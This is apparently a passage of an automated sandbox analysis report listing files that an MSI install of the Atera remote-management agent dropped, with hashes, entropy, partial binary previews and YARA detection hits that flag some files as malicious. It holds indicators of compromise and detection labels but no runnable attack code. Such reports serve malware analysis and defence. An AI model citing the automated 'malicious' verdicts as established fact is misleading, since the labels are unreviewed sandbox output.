                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):216496
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.646208142644182
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Jz/kyKA1X1dxbOZU32KndB4GLvyui2lhQtEaY4IDflQn0xHuudQ+cxEHSiZxaQ:/t/kE1jOZy2KL4GBiwQtEa4L2sV
                                                                                                                                                                                                                                                                                              MD5:A3AE5D86ECF38DB9427359EA37A5F646
                                                                                                                                                                                                                                                                                              SHA1:EB4CB5FF520717038ADADCC5E1EF8F7C24B27A90
                                                                                                                                                                                                                                                                                              SHA-256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
                                                                                                                                                                                                                                                                                              SHA-512:96ECB3BC00848EEB2836E289EF7B7B2607D30790FFD1AE0E0ACFC2E14F26A991C6E728B8DC67280426E478C70231F9E13F514E52C8CE7D956C1FAD0E322D98E0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................^.......\......].........................,.......<.........L...'.....'.....'.P.......8.....'.....Rich............................PE..L...Ap.]...........!.........P............................................................@.........................@................P..x....................`..........T...............................@...............<............................text...[........................... ..`.rdata..............................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\MSID178.tmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):521954
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                              MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                              SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                              SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                              SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................'P\....'P^....'P_...........................>.......4..................R......:...........Rich...........................PE..L....o.]...........!.....D...|.......L.......`......................................S#....@.........................0}...*......x.......d.......................4... s..T...........................xs..@............`..l............................text....B.......D.................. ..`.rdata...Q...`...R...H..............@..@.data...p...........................@....rsrc...d...........................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1728014633483967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:JSbX72Fj1AGiLIlHVRpIh/7777777777777777777777777vDHFzTPrfWrl0i8Q:J3QI5wBTr/F
                                                                                                                                                                                                                                                                                              MD5:2545826F0A5F9227980E1136D426EF8E
                                                                                                                                                                                                                                                                                              SHA1:3F1F6362AF4ACAB6BD41BD460100296A6979F908
                                                                                                                                                                                                                                                                                              SHA-256:206477B502BB5F9017FF0069818E5993F9223F5F5CFD41958DFEA168EF5D7441
                                                                                                                                                                                                                                                                                              SHA-512:B4A29541A955C976553CC0A239243E7A97618E328B289A5B25266789ECA101DD74603F9E5ED4E0F55702FA91497A7AE14B0A5AC30E081FB251E04E69D2FD457B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.1742506882225299
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:JSbX72FjuAGiLIlHVRpVh/7777777777777777777777777vDHFJQTI+SRal0i8Q:J8QI5x4h4F
                                                                                                                                                                                                                                                                                              MD5:554453CE18CD9DB6D2FBC705E3A68F20
                                                                                                                                                                                                                                                                                              SHA1:89337ED71BEF52B03E642AFBABB96A02E4367FC8
                                                                                                                                                                                                                                                                                              SHA-256:9B6571383186E1B07D3D2EAC9950B59D048C3DECC9E65E06626823E557B4F73F
                                                                                                                                                                                                                                                                                              SHA-512:CD3F8F71096D94459CC679270CDE91290740807FD1503BDA2DCD0AB725445A78BC327C225066697E70933E4255DC15B3D0FC93E2B4FBF5A5F7C80D6FC4AF9EC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.6207987421976968
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:W8PhPuRc06WXJEFT5uDKqISoedvPdvbCnuhnq9Onq9BGdStedvPdvxubS:phP1HFTQDvIciuBuOV4
                                                                                                                                                                                                                                                                                              MD5:6C9F273A8707FD4E195FF4F2D79178E2
                                                                                                                                                                                                                                                                                              SHA1:2D675F7C4F6C99B84F9E9AC474E2772E03EA733E
                                                                                                                                                                                                                                                                                              SHA-256:F94292120E245269A40A88370601D3277F4B63CC8650FEE6BE014288291F108E
                                                                                                                                                                                                                                                                                              SHA-512:3CF295A01EEC2777ECA7F1D7F282DF1D65B76EBA48F696E452FFB4302805B069A9D2C6CDAA1249ECC970561C94690418B932C6EE5154D1078D8343DFD2C15A97
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):432221
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.375182910045086
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauh:zTtbmkExhMJCIpErY
                                                                                                                                                                                                                                                                                              MD5:53BBFA7E8BE100F5D91C8E65CC8AAF39
                                                                                                                                                                                                                                                                                              SHA1:5CA1D3EB9DFB905965B7C6231C78A35102568F3A
                                                                                                                                                                                                                                                                                              SHA-256:C64DEEEDC38BD170EC6A95056E25681F8AAE92C81387BCB91337E86E8764E8FC
                                                                                                                                                                                                                                                                                              SHA-512:1C98CD613BDE6C6C41009F20E54F0ECB0E549274D19B3CCB00AAB5BD7F5A320EA52CD72F2C397D43F5897F9227EAD8DBE686886832F9673CA6C7CE8F601A843E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                                                                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):4926
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.243600050225524
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:FaqdF79/0+AAHdKoqKFxcxkF3/waqdF7OY+AAHdKoqKFxcxkF8O:cEi+AAsoJjykzE7+AAsoJjykB
                                                                                                                                                                                                                                                                                              MD5:2E0A0F5B2D97AB06F04135CB404DC46E
                                                                                                                                                                                                                                                                                              SHA1:0B86C7ADFCCEF61007E702B70EE32D19C41DEF7A
                                                                                                                                                                                                                                                                                              SHA-256:CAAA7F7F87F889FF0760A35D3A9C855CCE48690D88B3B852E406D76C806A4F29
                                                                                                                                                                                                                                                                                              SHA-512:79AA9124BDB52A40CF4B4915C7A99367276F7912A1286AAAE164A9358381D03AC305B3EEFBF85B79E7807573552FE550A96C07D6410BC793DDBCBB983229ED63
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. O.c.t. .. 0.4. .. 2.0.2.3. .1.2.:.0.3.:.4.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.

                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):651
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343677015075984
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yiv:ML9E4KlKDE4KhKiKhPKIE4oKNzKoM
                                                                                                                                                                                                                                                                                              MD5:7EEF860682F76EC7D541A8C1A3494E3D
                                                                                                                                                                                                                                                                                              SHA1:58D759A845D2D961A5430E429EF777E60C48C87E
                                                                                                                                                                                                                                                                                              SHA-256:65E958955AC5DBB7D7AD573EB4BB36BFF4A1DC52DD16CF79A5F7A0FA347727F1
                                                                                                                                                                                                                                                                                              SHA-512:BF7767D55F624B8404240953A726AA616D0CE60EC1B3027710B919D6838EFF7281A79B49B22AB8B065D8CA921EF4D09017A0991CB4A21DAF09B3B43E6698CB04
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..

                                                                                                                                                                                                                                                                                              C:\Windows\System32\InstallUtil.InstallLog

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):704
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                                                                              MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                                                                              SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                                                                              SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                                                                              SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4761
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.945585251880973
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                                                                                                                                                                                                                                                                                              MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                                                                                                                                                                                                                                                                                              SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                                                                                                                                                                                                                                                                                              SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                                                                                                                                                                                                                                                                                              SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):471
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.203745451418191
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:J0MgYPq9DW5o7UmhVPqn1qqfucjiIsEnsBeuL3+H1ws3/EcDLPH3Tc8CE6WaVIEz:JyYOK5GLsH6LBx23McHPjcJdWcn
                                                                                                                                                                                                                                                                                              MD5:93540FC05230487C467A36AAFBE3BB8E
                                                                                                                                                                                                                                                                                              SHA1:E9B78901234BB595B31E038A34BDC9FEAB30C36E
                                                                                                                                                                                                                                                                                              SHA-256:1B798BDA44609CC5FDF00E33018EDE7D9E5C7315DB28439E3648D353E45E1269
                                                                                                                                                                                                                                                                                              SHA-512:BCFF33619BA84374A50A77785DB022673F7C59A4ADB9825E856C5F95AC7A3102CFC6F3E9398EBFBF1610A9FA79A623375CEE55170D844C424B0DE56815ED2650
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:0..........0.....+.....0......0...0......E....1-Q...!..m....20250105190516Z0s0q0I0...+...........@..D3=?..Mn8...Q..E....1-Q...!..m..........-...P..@.Z....20250105190516Z....20250112190516Z0...*.H.............+)..<.@.....8..t<.o.p..*s..QU.....+..Y.D......Dx|.....bG9._T.......B.Vd...6RQoz...........oV....k+.......\.i...u-....~./V>[.?.N......T1.5dU.n...A.J....c..RF.p8..j 0hg% .JE[.9........2A.;.....!2.a.`g..jhU.5.:..y...w.!k.{~...a........J.5t.R

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.632685841945538
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:5o6Tq9UG5h44TUq+aqiBLe1cnpKGaDqsWj7ocolNR5YQJnwFxphxs3PQ8aw:5nGoq+oSWn4p+sWjYl1rxkphxs348aw
                                                                                                                                                                                                                                                                                              MD5:DE33D7F19862684188632305C34A38B1
                                                                                                                                                                                                                                                                                              SHA1:C4916E5F70146DD008CEBB154C0DFB1D7C4A271F
                                                                                                                                                                                                                                                                                              SHA-256:EA05998307AF355C25C30DC2186798D5D19A2AE9D79D7A061C9A4CD101BE68CC
                                                                                                                                                                                                                                                                                              SHA-512:802DC1547C87E1E034B4E6CD25D6E49F9F357299481A905A9522B1163AB45E95D7821BF3774F9CBE42E9BB9355525C492B58D2E11571859D0FF8A229C9B686FE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20250105213703Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...(I.x...#...R....20250105212102Z....20250112202102Z0...*.H..............s.4.o.......'b._......V-~T..j2.?..:......@.du..F.....+E.Sd.me[.....K.3.e..h..}.e......g..84..5j.N..8...d...7.;8...K)..fN..c.....b......`:...6.....c+.].x.,.W.. .C../k.gAq..t.VF*A*....s.#.....b....E.V.vY........K.P!w6#.....*....[.`....p8#0..H......8.<..<.%v..P.^....G.Q.U.Do..KVr2W.Q...C....=.+..D'.8...f.2.....at./....L&./.Q.._X..9....b..K....-...\jF..|..6;....%&..-w...n...tl(l....-.......|/....<....Sk..M~...i.......zD.Z..)M.(.b...\>....."&.&...^.....U"..I.;.{..$R.....1.:...]w.H.

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                                                              MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                                                              SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                                                              SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                                                              SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.560079546242875
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:5onfZf4Dc5RlRtBfQ2DcUEqsLrD/t20WIyHfC0ebDqCbZ8wvsRbeRSeo9hHWwnQ9:5iBecdZP/eBIfC0e3qwZ8wtRSe7K3xTa
                                                                                                                                                                                                                                                                                              MD5:05164D501071A25477ECE52F898CFED8
